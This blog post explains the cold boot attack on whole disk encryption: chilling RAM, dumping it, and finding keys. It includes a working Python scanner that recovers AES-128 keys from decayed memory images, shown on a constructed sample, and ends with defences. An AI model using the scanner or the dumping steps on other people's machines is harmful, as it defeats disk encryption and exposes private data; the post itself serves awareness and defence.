There’s a lot of buzz in the security industry right now after a paper was published by researchers from Princeton University that demonstrates how whole disk encryption systems can be completely thwarted by obtaining the encryption keys from a laptop’s RAM. How is this possible? Well, whenever the operating system is running or in sleep mode (suspend to RAM), the decryption keys are held in memory so the OS can keep reading and writing the encrypted disk, and they stay there until the machine is actually powered off, not just put to sleep. In addition, RAM chips don’t lose their contents the instant power is removed: they decay over seconds to minutes, at rates that vary from chip to chip. Cooling the chips slows that decay dramatically; the researchers found that a simple can of air duster turned upside down and sprayed on the chips keeps the contents largely intact for 10 minutes or more. Once the chips are cooled, their contents can be dumped by booting to a USB disk with a memory extraction tool, or, if you’re unable to change the boot order, the chips can be removed and transferred to another system where their contents can be read out. Once the contents of RAM are extracted, code can be run to locate the encryption keys (the paper’s tools search for the AES key schedule, whose redundancy makes it recognisable even when some bits have decayed), and those keys can then be used to decrypt data off the disk. Scary eh?
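To make the last step concrete, here is an added example of the key-finding idea: it is not code from the original post or from the Princeton team’s tools, but it follows the same approach the paper describes. An AES-128 key schedule is 176 bytes derived deterministically from the 16-byte key, so any 16-byte window of a memory image whose expansion approximately matches the 160 bytes that follow it is almost certainly a live key. The scan below tolerates a budget of flipped bits to account for decay. The memory image, the planted key and the "decayed" bits are all constructed inline for the demonstration; a real run would read a dump taken from the machine.

```python
"""aeskeyfind-style scan of a memory image for AES-128 key schedules.

Added example; not code from the original post or the paper's tools.
The sample image built by build_test_image() is constructed, not captured.
"""
import random

RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]
ROUNDS = 10                          # AES-128
SCHEDULE_LEN = 16 * (ROUNDS + 1)     # 176 bytes of expanded key material


def _rotl8(x, k):
    return ((x << k) | (x >> (8 - k))) & 0xFF


def _build_sbox():
    """AES S-box: multiplicative inverse in GF(2^8), then the affine map."""
    sbox = [0] * 256
    p = q = 1                                   # invariant: p * q == 1
    while True:
        p = p ^ ((p << 1) & 0xFF) ^ (0x1B if p & 0x80 else 0)   # p *= 3
        q ^= q << 1
        q ^= q << 2
        q ^= q << 4
        q &= 0xFF                                               # q /= 3
        if q & 0x80:
            q ^= 0x09
        sbox[p] = (q ^ _rotl8(q, 1) ^ _rotl8(q, 2)
                   ^ _rotl8(q, 3) ^ _rotl8(q, 4) ^ 0x63)
        if p == 1:
            break
    sbox[0] = 0x63                              # 0 has no inverse
    return sbox


SBOX = _build_sbox()


def iter_round_keys(key):
    """Yield the 11 round keys of AES-128 (FIPS-197 key expansion)."""
    words = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    yield bytes(key)
    for rnd in range(1, ROUNDS + 1):
        for i in range(4 * rnd, 4 * rnd + 4):
            temp = list(words[i - 1])
            if i % 4 == 0:
                temp = [SBOX[b] for b in temp[1:] + temp[:1]]  # RotWord, SubWord
                temp[0] ^= RCON[rnd - 1]
            words.append([a ^ b for a, b in zip(words[i - 4], temp)])
        yield bytes(b for w in words[4 * rnd:4 * rnd + 4] for b in w)


def expand_key_128(key):
    return b"".join(iter_round_keys(key))


def _bit_errors(a, b):
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def find_aes128_keys(image, max_bit_errors=40):
    """Return (offset, key, decayed_bits) for each 16-byte window whose
    expansion matches the next 160 bytes within max_bit_errors flipped bits.

    Decay is tolerated in the derived round keys only; the paper's full
    algorithm also repairs flipped bits in the key bytes themselves.
    """
    hits = []
    for off in range(len(image) - SCHEDULE_LEN + 1):
        cand = bytes(image[off:off + 16])
        rounds = iter_round_keys(cand)
        next(rounds)                            # round 0 is cand itself
        errors = 0
        for r, rk in enumerate(rounds, start=1):
            errors += _bit_errors(rk, image[off + 16 * r:off + 16 * r + 16])
            if errors > max_bit_errors:         # random data fails fast
                break
        else:
            hits.append((off, cand, errors))
    return hits


def build_test_image(seed=1, decayed_bits=12):
    """Constructed sample: 4 KiB of random filler with one key schedule
    planted at offset 0x3E8 and `decayed_bits` distinct bits flipped in
    rounds 1-10, standing in for RAM that sat without power for a while."""
    rng = random.Random(seed)
    image = bytearray(rng.getrandbits(8) for _ in range(4096))
    key = bytes(rng.getrandbits(8) for _ in range(16))
    off = 0x3E8
    image[off:off + SCHEDULE_LEN] = expand_key_128(key)
    for bit in rng.sample(range(16 * 8, SCHEDULE_LEN * 8), decayed_bits):
        image[off + bit // 8] ^= 1 << (bit % 8)
    return bytes(image), key, off


if __name__ == "__main__":
    image, key, off = build_test_image()
    for hit_off, hit_key, errs in find_aes128_keys(image):
        print(f"key schedule at {hit_off:#06x}: {hit_key.hex()} "
              f"({errs} decayed bits)")
```

The error budget is what makes this work on a decayed dump: a random 16-byte window disagrees with its "expansion" in roughly half of the bits of every round, so it blows through the budget after one or two rounds and is discarded, while a genuine key with a few percent of its schedule bits flipped still passes. The same idea extends to AES-256 (a longer schedule) and, with different redundancy checks, to RSA private keys, which is how the paper's tools recovered keys for the products listed below.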
The original paper by the Princeton researchers can be found here.
There’s also coverage of the issue by the SANS ISC here (which includes a video demonstrating the attack) and here (which gives guidance for the known whole disk encryption products).
Currently known affected products are Microsoft BitLocker, Apple’s FileVault, and TrueCrypt. The second ISC link reports that PGP Whole Disk Encryption and Utimaco SafeGuard are also vulnerable. No news yet from Check Point on Pointsec. However, since the attack goes after the keys sitting in RAM rather than any flaw in a particular product, it’s safe to assume that almost all whole disk encryption products are vulnerable to it.
How do you safeguard against it? Power down your system instead of sleeping or hibernating, and don’t leave it unattended until the memory has had a few minutes to decay. Two caveats the paper points out: powering off only helps if the encryption software actually clears its keys from RAM at shutdown rather than simply halting, and only if unlocking the disk requires a PIN or passphrase at boot. BitLocker in its default TPM-only mode loads the key automatically during boot, so an attacker who can simply reboot the machine can capture the key that way; configure it to require a PIN or USB key as well.
Agree? Disagree? Let me know with a comment...